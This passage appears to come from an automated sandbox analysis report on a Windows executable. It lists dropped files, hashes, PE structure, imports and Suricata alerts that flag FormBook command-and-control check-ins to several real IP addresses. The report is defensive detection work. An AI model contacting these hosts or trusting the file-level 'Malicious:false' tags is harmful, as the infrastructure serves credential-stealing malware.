                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aut37ED.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\z6tNjJC614.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.991592000330817
                                                                    Encrypted:true
                                                                    SSDEEP:6144:6tOCQciV6P3gJgEpdU2wk2l8MFvA4ojuAADg/cJVC0TE:peSAQJ1d0l8mVCgE
                                                                    MD5:6489C53A2B6FF91721223EBA74FF6B6C
                                                                    SHA1:A2B0B91BE87CF9A5B801B6FA2EC0D90FDE38E5BF
                                                                    SHA-256:86560DE4362D78F632F35CAAC8DFACC50676CAA33E54F1DF2EEE50190B178BAC
                                                                    SHA-512:CDB92C5D39D79AA35CE90A7AFD5D326FE7097E71921F91734729E05FF6FA071DDD20FA9650D86CE7310E9F470036EC7FB83B13E31B704F8A33E787FB556771AA
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...YE3NOOWFY..YF.NOKWFYM.YF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF.NOKYY.CH.O.o.J..x. 05.>=$048 h:'] ?w$<m:,(.'!k...m%6"V`BF]bYMHYF3N6J^.d-/.{S).v7!.W....(.M..t9!.T..z9*../P&r+0.YMHYF3NO..FY.IXFO...WFYMHYF3.OIVMXFHY.7NOKWFYMHYv&NOKGFYM8]F3N.KWVYMH[F3HOKWFYMH_F3NOKWFY=LYF1NOKWFYOH..3N_KWVYMHYV3N_KWFYMHIF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHw2V6;KWF..LYF#NOK.BYMXYF3NOKWFYMHYF3nOK7FYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKW

                                                                    C:\Users\user\AppData\Local\Temp\inhumation

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\z6tNjJC614.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.991592000330817
                                                                    Encrypted:true
                                                                    SSDEEP:6144:6tOCQciV6P3gJgEpdU2wk2l8MFvA4ojuAADg/cJVC0TE:peSAQJ1d0l8mVCgE
                                                                    MD5:6489C53A2B6FF91721223EBA74FF6B6C
                                                                    SHA1:A2B0B91BE87CF9A5B801B6FA2EC0D90FDE38E5BF
                                                                    SHA-256:86560DE4362D78F632F35CAAC8DFACC50676CAA33E54F1DF2EEE50190B178BAC
                                                                    SHA-512:CDB92C5D39D79AA35CE90A7AFD5D326FE7097E71921F91734729E05FF6FA071DDD20FA9650D86CE7310E9F470036EC7FB83B13E31B704F8A33E787FB556771AA
                                                                    Malicious:false
                                                                    Preview:...YE3NOOWFY..YF.NOKWFYM.YF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF.NOKYY.CH.O.o.J..x. 05.>=$048 h:'] ?w$<m:,(.'!k...m%6"V`BF]bYMHYF3N6J^.d-/.{S).v7!.W....(.M..t9!.T..z9*../P&r+0.YMHYF3NO..FY.IXFO...WFYMHYF3.OIVMXFHY.7NOKWFYMHYv&NOKGFYM8]F3N.KWVYMH[F3HOKWFYMH_F3NOKWFY=LYF1NOKWFYOH..3N_KWVYMHYV3N_KWFYMHIF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHw2V6;KWF..LYF#NOK.BYMXYF3NOKWFYMHYF3nOK7FYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKWFYMHYF3NOKW

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.20804345871156
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:z6tNjJC614.exe
                                                                    File size:1'225'216 bytes
                                                                    MD5:043a47d412717c236558774c700bb159
                                                                    SHA1:bb9aada716669988693a17d9c559e683b194a5d1
                                                                    SHA256:2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde
                                                                    SHA512:bbe37171bdb46d6b1dbfcf620d05a09a8e82b0091492549ed40d51a147a8382fc04d7fc13fd2231c5ad0b2e8bc811cde70a8b5a41240f7d9f60201a4e72d28d9
                                                                    SSDEEP:24576:2u6J33O0c+JY5UZ+XC0kGso6FaGEHL8EUwZIeq0orhjAsFLv1xWY:Yu0c++OCvkGs9FaGEHInwFq0o1jAWLOY
                                                                    TLSH:8B45CF22B3DDC360CB769173BF69B7016EBF38610630B95B2F980D7DA950161262D7A3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                    File Icon

                                                                    Icon Hash:aaf3e3e3938382a0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x427dcd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67506198 [Wed Dec 4 14:05:12 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007FCDB8E966BAh
                                                                    jmp 00007FCDB8E89484h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [esp+10h]
                                                                    mov ecx, dword ptr [esp+14h]
                                                                    mov edi, dword ptr [esp+0Ch]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007FCDB8E8960Ah
                                                                    cmp edi, eax
                                                                    jc 00007FCDB8E8996Eh
                                                                    bt dword ptr [004C31FCh], 01h
                                                                    jnc 00007FCDB8E89609h
                                                                    rep movsb
                                                                    jmp 00007FCDB8E8991Ch
                                                                    cmp ecx, 00000080h
                                                                    jc 00007FCDB8E897D4h
                                                                    mov eax, edi
                                                                    xor eax, esi
                                                                    test eax, 0000000Fh
                                                                    jne 00007FCDB8E89610h
                                                                    bt dword ptr [004BE324h], 01h
                                                                    jc 00007FCDB8E89AE0h
                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                    jnc 00007FCDB8E897ADh
                                                                    test edi, 00000003h
                                                                    jne 00007FCDB8E897BEh
                                                                    test esi, 00000003h
                                                                    jne 00007FCDB8E8979Dh
                                                                    bt edi, 02h
                                                                    jnc 00007FCDB8E8960Fh
                                                                    mov eax, dword ptr [esi]
                                                                    sub ecx, 04h
                                                                    lea esi, dword ptr [esi+04h]
                                                                    mov dword ptr [edi], eax
                                                                    lea edi, dword ptr [edi+04h]
                                                                    bt edi, 03h
                                                                    jnc 00007FCDB8E89613h
                                                                    movq xmm1, qword ptr [esi]
                                                                    sub ecx, 08h
                                                                    lea esi, dword ptr [esi+08h]
                                                                    movq qword ptr [edi], xmm1
                                                                    lea edi, dword ptr [edi+08h]
                                                                    test esi, 00000007h
                                                                    je 00007FCDB8E89665h
                                                                    bt esi, 03h
                                                                    jnc 00007FCDB8E896B8h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ASM] VS2013 build 21005
                                                                    • [ C ] VS2013 build 21005
                                                                    • [C++] VS2013 build 21005
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                    • [RES] VS2013 build 21005
                                                                    • [LNK] VS2013 UPD4 build 31101

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x62960.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x711c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xc70000x629600x62a007923f305310f6a80d7f748f4e405d99bFalse0.9336333570975919data7.906698136949193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x12a0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                    RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                    RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                    RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                    RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                    RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                    RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                    RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                    RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                    RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0xcf7b80x59c25data1.0003291146815068
                                                                    RT_GROUP_ICON0x1293e00x76dataEnglishGreat Britain0.6610169491525424
                                                                    RT_GROUP_ICON0x1294580x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x12946c0x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x1294800x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x1294940xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x1295700x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                    Imports

                                                                    DLLImport
                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-11T08:15:40.434176+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750008104.21.42.7780TCP
                                                                    2025-01-11T08:16:42.756658+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749972154.205.156.2680TCP
                                                                    2025-01-11T08:16:59.497328+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997347.76.213.19780TCP
                                                                    2025-01-11T08:17:02.081515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997447.76.213.19780TCP
                                                                    2025-01-11T08:17:04.638978+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997647.76.213.19780TCP
                                                                    2025-01-11T08:17:07.189292+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74997747.76.213.19780TCP
                                                                    2025-01-11T08:17:13.306462+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997874.48.143.8280TCP
                                                                    2025-01-11T08:17:15.868025+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997974.48.143.8280TCP
                                                                    2025-01-11T08:17:18.395884+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998074.48.143.8280TCP
                                                                    2025-01-11T08:17:20.955304+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74998174.48.143.8280TCP
                                                                    2025-01-11T08:17:26.456079+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998213.248.169.4880TCP
                                                                    2025-01-11T08:17:29.005833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998313.248.169.4880TCP
                                                                    2025-01-11T08:17:31.571928+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998413.248.169.4880TCP
                                                                    2025-01-11T08:17:34.104111+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74998513.248.169.4880TCP
                                                                    2025-01-11T08:17:40.319273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749986103.21.221.8780TCP
                                                                    2025-01-11T08:17:42.840779+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749987103.21.221.8780TCP
                                                                    2025-01-11T08:17:45.392008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988103.21.221.8780TCP
                                                                    2025-01-11T08:17:48.016406+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749989103.21.221.8780TCP
                                                                    2025-01-11T08:17:54.627543+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7499908.218.14.12080TCP
                                                                    2025-01-11T08:17:57.228314+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7499918.218.14.12080TCP
